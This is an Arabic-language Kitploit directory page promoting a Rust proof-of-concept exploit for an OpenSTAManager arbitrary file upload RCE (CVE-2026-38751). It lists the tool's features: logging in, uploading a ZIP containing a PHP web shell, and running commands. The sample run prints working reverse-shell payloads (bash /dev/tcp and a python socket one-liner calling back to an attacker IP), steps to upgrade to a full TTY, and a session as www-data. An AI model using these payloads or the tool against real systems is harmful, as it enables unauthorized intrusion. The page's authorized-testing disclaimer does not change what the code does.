Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
OpenSTAManager-RCE-Exploit-CVE-2026-38751 — OpenSTAManager-RCE-Exploit-CVE-2026-38751 | Kitploit
أدوات/GitHubGitHub/b0ysie7e/openstamanager-rce-exploit-cve-2026-38751
تحليل الثغرات الأمنيةالاستغلالشيل كوداستغلال تطبيقات الويباختبار الاختراقالتعلم والتعليمالفريق الأحمرتطوير الحمولات

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة
GitHub
b0ysie7e/openstamanager-rce-exploit-cve-2026-38751

OpenSTAManager-RCE-Exploit-CVE-2026-38751

OpenSTAManager-RCE-Exploit-CVE-2026-38751

عرض المستودع
8منذ شهر واحدلم تتم المراجعة بعد

استغلال RCE في OpenSTAManager (CVE-2026-38751)

رفع ملفات تعسفي يؤدي إلى تنفيذ التعليمات البرمجية عن بُعد
إثبات مفهوم متكامل لثغرة CVE-2026-38751، مكتوب بلغة Rust.

** تحذير**: هذه الأداة مخصصة لاختبارات الأمان المصرح بها والأغراض التعليمية فقط. استخدمها فقط على الأنظمة التي تملكها أو لديك إذن صريح لاختبارها.


الوصف

يكون OpenSTAManager ≤ 2.10 عرضة لثغرة رفع ملفات تعسفي يتطلب مصادقة تسمح للمهاجم برفع أرشيف ZIP خبيث يحتوي على قشرة ويب PHP. تعمل هذه الأداة (PoC) على أتمتة العملية:

  • تسجيل الدخول ببيانات اعتماد صالحة
  • رفع وحدة خبيثة تحتوي على قشرة ويب
  • التحقق من الثغرة
  • قشرة ويب تفاعلية (تنفيذ الأوامر)
  • قشرة عكسية مع معالجة TTY (حمولات متعددة)
  • تنظيف الباب الخلفي المرفوع

الميزات

الميزةالوصف
تسجيل الدخوليصادق باستخدام بيانات الاعتماد المقدمة.
إنشاء ZIPينشئ ملف ZIP مع واصف MODULE صالح وقشرة PHP.
رفع الملفيرسل ملف ZIP الخبيث عبر آلية التحديث.
التحققيتحقق من إمكانية الوصول إلى القشرة وينفذ أمر اختبار (id).
قشرة الويب التفاعليةيتيح لك تشغيل الأوامر بشكل تفاعلي عبر قشرة الويب (-i).
القشرة العكسيةيرسل حمولات متعددة (bash, python, base64, nc, mkfifo) للحصول على قشرة.
إرشادات ترقية TTYيعرض دليلاً خطوة بخطوة للحصول على TTY تفاعلي بالكامل.
التنظيفيزيل ملف shell.php المرفوع تلقائياً (إلا مع --no-cleanup).

🛠️ المتطلبات

  • Rust (1.70+)
  • هدف يعمل بنظام OpenSTAManager ≤ 2.10.
  • حساب مستخدم صالح (مع كلمة مرور) لتسجيل الدخول.

التثبيت

استنسخ المستودع وقم ببناء الملف التنفيذي:

root@kitploit:~
git clone https://github.com/yourusername/OpenSTAManager-RCE-Exploit-CVE-2026-38751
cd OpenSTAManager-RCE-Exploit-CVE-2026-38751
cargo build --release
./target/release/openstamanager-rce-exploit --help

مثال:

root@kitploit:~
$ ./openstamanager-rce-exploit --url http://target.com/ -U <user> -P <password> --lhost 10.10.14.5 --lport 4444

[ OpenSTAManager RCE Exploit : ]

Target: http://target.com/
[*] Step 1: Login...
[+] Login successful: admin
[*] Step 2: Enable updates...
[+] Updates enabled
[*] Step 3: Create ZIP...
[*] Created in-memory ZIP file
[*] Shell location: /modules/shell/shell.php
[*] Step 4: Upload...
[*] Upload status: 500 Internal Server Error
[+] Upload successful
[*] Step 5: Verify...
[+] Vulnerability confirmed!
[+] Shell: http://target.com/modules/shell/shell.php
[+] Test: http://target.com/modules/shell/shell.php?c=whoami
[*] Listening on 10.10.14.5:4444...
[*] Trying payload: bash -c 'bash -i >& /dev/tcp/10.10.14.5/4444 0>&1'
[-] Payload failed: operation timed out
[*] Trying payload: python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.14.5",4444));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);subprocess.call(["/bin/bash","-i"])'
[-] Payload failed: operation timed out
[*] Trying payload: python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.14.5",4444));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);subprocess.call(["/bin/bash","-i"])'
[+] Payload sent successfully. Waiting for connection...
[+] Connection received from 10.129.19.238:55758
[*] Sent 'script /dev/null -c bash'

[*]
[*] Reverse shell established.
[*] To get a fully interactive TTY:
[*] 1. Press Ctrl+Z to suspend the shell.
[*] 2. Run: stty raw -echo; fg
[*] 3. When prompted for terminal type, type: xterm
[*] 4. Export: export TERM=xterm SHELL=bash
[*] 5. Adjust rows/columns with: stty rows <rows> columns <cols>
[*]    (Get the size with: stty size)
[*]
[*] Press Ctrl+C to exit and cleanup the webshell.

bash: cannot set terminal process group (1481): Inappropriate ioctl for device
bash: no job control in this shell
www-data@target:~/html/openstamanager/modules/shell$ script /dev/null -c bash
Script started, output log file is '/dev/null'.
www-data@target:~/html/openstamanager/modules/shell$ whoami
whoami
www-data
www-data@target:~/html/openstamanager/modules/shell$
تنزيل الأداة